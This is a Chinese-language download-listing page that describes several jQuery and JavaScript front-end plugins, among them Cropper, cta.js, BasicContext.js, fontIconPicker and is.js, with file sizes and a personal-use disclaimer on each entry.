...opper是一款深受开发者喜爱的轻量级且功能丰富的图片裁剪插件,它基于jQuery库构建,旨在提供简单易用且高度可定制的图像处理体验。Cropper不仅适用于桌面浏览器,还对触摸屏设备进行了优化支持,确保用户在各种环境下都能流畅地进行图片裁剪操作。该插件允许用户通过简单的拖拽、缩放和旋转等交互方式来精确裁剪上传或已存在的图片,同时具备放大缩小功能以确保细节调整的精准性。Cropper利用HTML5Canvas技术实现高性能渲染,确保了在不同浏览器下的兼容性和性能表现。此外,Cropper能够生成符合跨浏览器标准的数据,便于与后端服务集成,将用户裁剪后的图片内容无缝保存至服务器或者数据库中。因其强大的功能集和灵活的API设计,Cropper成为了众多Web应用中不可或缺的前端图片处理工具,广泛应用于头像上传、产品编辑、设计工具等多个场景。 点我下载 文件大小:490.55 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-08-08 23:21:57
310
本站
JQuery插件下载
...疑是一个强大的工具。开发者只需简单地引入插件,然后指定需要应用此功能的文本元素,即可实现文字随屏幕尺寸变化而自动调整的效果。这不仅提升了用户体验,也简化了前端开发者的负担,让他们可以更专注于其他重要功能的实现。无论是新闻网站、博客平台还是企业官网,adapttext.js都能发挥其独特的优势,确保页面上的每一个文字都能够以最佳状态呈现给用户。通过使用adapttext.js,你可以轻松创建出既美观又实用的响应式网页布局,让访问者无论使用何种设备,都能获得一致且优秀的阅读体验。 点我下载 文件大小:122.17 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2025-02-11 11:10:08
60
本站
JQuery插件下载
...性能和极简设计赢得了开发者们的青睐,尤其适合在不依赖jQuery等大型库的项目中使用。cta.js赋予开发人员能力,只需简单配置,就能实现页面上任何元素间的交互式动画效果。通过点击特定按钮、链接或其他可交互元素,cta.js能够驱动其他任意元素执行流畅且丰富的动画序列,为用户带来惊艳的视觉体验。更进一步,cta.js不仅可以实现基础动画,还能帮助构建复杂的模态窗口动画效果,如淡入淡出、滑动显示、缩放等。其纯JavaScript编写的特点确保了代码的简洁高效,同时也降低了对浏览器资源的占用,有助于提升网页性能和用户体验。这款插件对于追求轻量化、高性能和动态视觉表达的前端开发者来说,是一个理想的工具选择。 点我下载 文件大小:91.60 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-10-09 18:24:52
150
本站
JQuery插件下载
...方案,专为提升Web应用的交互体验而设计。这款强大的插件无需依赖jQuery,但兼容并可轻松集成到jQuery环境中。它允许开发者创建动态且灵活的右键菜单,不仅限于传统的鼠标右击,还支持左键菜单和位置定制。用户可以选择在特定元素或页面任何位置触发菜单,提供了丰富的自定义选项,以适应各种应用场景。其核心特点是轻量级,使得它能在移动设备上顺畅运行,同时保持高性能。BasicContext.js通过简单的API,让开发者能够根据需要添加个性化菜单项,比如关联操作、快捷功能等。无论是网站导航、内容管理还是数据分析,都能借助这个插件实现直观且高效的用户操作。总的来说,BasicContext.js是一款实用且高度可扩展的工具,为提升网页用户体验增添了一大助力。 点我下载 文件大小:72.04 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-06-04 21:11:58
88
本站
JQuery插件下载
...数丰富,可以满足不同场景下的需求,使得每一个细节都可以按照你的喜好进行个性化设置。简洁的API设计使得即使是前端开发新手也能快速上手,迅速为自己的项目添加这一令人愉悦的功能。总之,letItSnow.js是一个能够提升用户体验并增加网站吸引力的强大工具。 点我下载 文件大小:48.15 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-12-21 10:55:23
231
本站
JQuery插件下载
...ery插件,专为网页开发设计,尤其在构建自定义表单时提供了一种便捷的字体图标选择解决方案。该插件以小巧、高效的特性为核心,通过简单的下拉框形式展现,使用户能够从多种预设的字体图标集中进行快速选取。不仅支持各类流行的字体图标库如FontAwesome,还允许开发者根据需求配置和扩展图标资源。在使用fontIconPicker时,开发者可以根据UI设计风格调整其外观样式,确保与整体界面无缝融合。此外,插件提供了搜索功能,方便用户在大量图标中迅速定位目标图标,并支持分页显示,便于管理和加载大规模图标集。调用和应用所选图标的接口也非常直观简洁,使得在表单控件或其他任何HTML元素上动态应用图标变得轻松容易。总之,fontIconPicker是提升用户体验、简化字体图标管理流程的理想工具,深受前端开发者的青睐。 点我下载 文件大小:722.80 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-05-15 18:12:40
114
本站
JQuery插件下载
...需复杂的配置或大量的前端开发知识。无论是用于个人博客展示旅行照片,还是企业官网展示产品图片,这款jQuery插件都能完美胜任。它不仅美化了图片展示的方式,还增强了用户的互动性和参与感。通过使用jQuery弹性响应式网格布局图片画廊插件,你可以轻松创建出既美观又实用的图片画廊,为访问者带来更佳的视觉享受和浏览体验。 点我下载 文件大小:3.02 MB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2025-02-03 11:04:24
35
本站
JQuery插件下载
...于表单字段验证,还能应用于多种类型的值判断。在表单验证场景下,开发者可以利用is.js简化和增强对用户输入数据的校验流程。通过集成is.js到项目中,开发者能够便捷地检测表单字段内容是否符合预期格式,比如验证电子邮件地址、URL链接的有效性,或是检查输入是否为数组类型、特定的数据结构等。此外,它还具备检测浏览器类型的能力,有助于实现跨浏览器兼容的前端逻辑。更为独特的是,is.js还支持正则表达式和数学表达式的检测,这意味着开发者可以根据具体需求编写定制化的验证规则,极大地提升了表单验证的灵活性与扩展性。总之,is.js作为一个全面且高效的验证工具,可显著提升开发效率,并确保表单提交的质量和用户体验。 点我下载 文件大小:75.07 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-01-04 11:44:37
53
本站
JQuery插件下载
...der插件非常简便,开发者只需将目标图片放置在标准的HTML列表结构内,插件会自动解析并应用3D转换效果,营造出仿佛实物旋转般的视觉体验。此外,这款插件不仅兼容现代浏览器,并且特别优化了触摸屏设备的交互性,确保在桌面和移动设备上都能展现出一致且出色的用户体验。整体而言,cubeSlider凭借其简洁的代码结构、易于集成的特性以及卓越的3D动画表现力,在满足各种项目需求的同时,也为网页设计师和前端开发者提供了一种新颖而高效的图片轮播解决方案。 点我下载 文件大小:39.20 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-02-14 12:22:06
61
本站
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
sed 's/old/new/g' file.txt
- 替换文件中的文本。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"